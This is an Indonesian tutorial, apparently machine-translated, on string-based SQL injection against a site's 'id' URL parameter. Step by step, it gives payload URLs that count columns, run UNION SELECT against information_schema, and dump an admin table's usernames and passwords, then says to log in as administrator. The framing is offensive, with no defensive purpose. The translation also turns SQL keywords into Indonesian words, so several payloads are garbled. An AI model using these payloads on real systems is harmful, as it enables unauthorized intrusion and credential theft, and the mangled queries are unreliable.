String Berbasis SQL Injection

Halo Teman,Sangat sering kita datang di website di mana kita menemukan sebuah URL seperti ini:

    Quote: http://site.com/index.php?id=1


Kami menambahkan 'pada akhir URL dan kita mendapatkan error.Kemudian, kami mencoba mendapatkan count kolom dengan mengetik:

    Quote: http://site.com/index.php?id=1 order by 1 -
    Atau

    http://site.com/index.php?id=1 order by 2 -
    Atau

    http://site.com/index.php?id=1 order by 3 -

Dan seterusnya sampai kita mendapatkan pesan kesalahan.
Tapi, kadang-kadang kita terus dan terus dan bahkan sampai ini:

    Quote: http://site.com/index.php?id=1 order by 100 -


Kami tidak mendapatkan pesan kesalahan. Jelas, hitungan kolom tidak akan lebih dari 100.
Jadi, kita hanya meninggalkan situs web dan pergi untuk situs lain.Berikut ini di mana String Berbasis SQL Injection datang ke dalam bermain.
Berikut adalah langkah-langkah:1. Untuk memeriksa apakah situs tersebut rentan terhadap String Berbasis SQL Injection, kita perlu beberapa karakter tambahan.Misalkan ini adalah link kami:

    Quote: http://site.com/index.php?id=1

Menambahkan 'pada akhir link dan kemudian menambahkan order by 100 - + setelah itu.Jadi, URL akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'order by 100 - +

Jika pesan kesalahan muncul, situs ini rentan terhadap String Berbasis SQL Injection.
2. Sekarang, seperti Uni Berdasarkan SQL Injection, mencari jumlah kolom replaing yang 100 dalam URL sebelumnya dengan 1, 2 dan seterusnya ..Jadi, URL akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'order by 1 - +
    Atau

    http://site.com/index.php?id=1 'order by 2 - +

Dan seterusnya ...Sekarang, rasa Anda mendapatkan kesalahan dalam URL ini:

    Quote: http://site.com/index.php?id=1 'order by 6 - +
Dan Anda tidak mendapatkan error dalam URL ini:

    Quote: http://site.com/index.php?id=1 'order by 5 - +
Ini berarti, jumlah kolom dalam 5
3. Sekarang, kita menemukan kolom rentan. Hapus order by 5 dari URL dan menambahkan union select 1,2,3,4,5Jadi, URL akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'union select 1,2,3,4,5 - +

4. Misalkan dari langkah 3, kita mendapatkan kolom rentan 1,2 dan 3. Sekarang, kita perlu melihat di meja. Kami akan menggunakan kolom 2 untuk mengeksekusi Queries Injection SQL kami.Jadi, dalam URL dari langkah 3, hapus 2 dan menggantinya dengan group_concat (table_name) dan tepat sebelum - + tambahkan dari information_schema.tables di mana table_schema = database ()Jadi, URL sekarang akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'union select 1, group_concat (table_name), 3,4,5 dari information_schema.tables di mana table_schema = database () - +


5. Seperti yang kita mengeksekusi query pada langkah 4, kita mendapatkan daftar dari semua tabel dalam database. Sekarang, anggaplah kami tertarik untuk melihat sebuah tabel bernama admin yang berisi log dalam kredensial dari admin.Untuk, melihat nama-nama kolom dari admin meja, kita perlu untuk menemukan nilai ascii dari karakter dari admin string yang. Kita bisa melakukannya dengan setara heksadesimal juga, tapi aku menggunakan ASCII di sini.The ascii satu karakter dari admin adalah 97, 100, 109, 105, 110.Untuk mendapatkan nama kolom dari admin meja, kita perlu mengganti group_concat (table_name) dari langkah 4 dengan group_concat (column_name), ganti information_schema.tables dengan information_schema.columns dan table_schema = database () dengan table_name = char (97, 100, 109, 105, 110) di mana 97, 100, 109, 105, 110 adalah ASCII dari nama meja kami admin.Jadi, URL akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'union select 1, group_concat (column_name), 3,4,5 dari information_schema.columns mana table_name = char (97, 100, 109, 105, 110 ) - +


6. Seperti yang kita mengeksekusi query dari langkah 5, kita mendapatkan daftar dari semua kolom dari admin tabel. Misalkan ada dua kolom dalam admin yaitu username dan password.Untuk mendapatkan nilai dari username dan password kolom, kita perlu mengganti group_concat (column_name) dari langkah 5 dengan nama pengguna dan mengganti information_schema.columns mana nama_tabel = char (97, 100, 109, 105, 110) dengan database (). Admin di mana admin adalah nama dari meja kami.Jadi, URL kami akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'union select 1, username, 3,4,5 dari database () admin - +.

Dan kita mendapatkan entri data dari kolom nama pengguna.
7. Untuk mendapatkan entri data dari kolom password, kita hanya perlu mengganti username dari langkah 6 dengan passwordJadi, URL akan terlihat seperti ini:

    Quote: http://site.com/index.php?id=1 'union select 1, kata sandi, 3,4,5 dari database () admin - +.

Sandi dapat hashed sehingga, kita akan membutuhkan sebuah Decrypter hash online untuk mendapatkan string asli.
CATATAN: Pada langkah 6 dan 7, jika ada kesalahan, maka kita perlu mengganti [b] database () dengan nama database.Its mudah untuk mendapatkan nama database, hanya mengeksekusi query ini:

    Quote: http://site.com/index.php?id=1 'union select 1, database () ,3,4,5 - +

Oleh karena itu, kita memiliki username dan password administrator. Jadi, sekarang, kita dapat dengan mudah log in dari halaman login admin.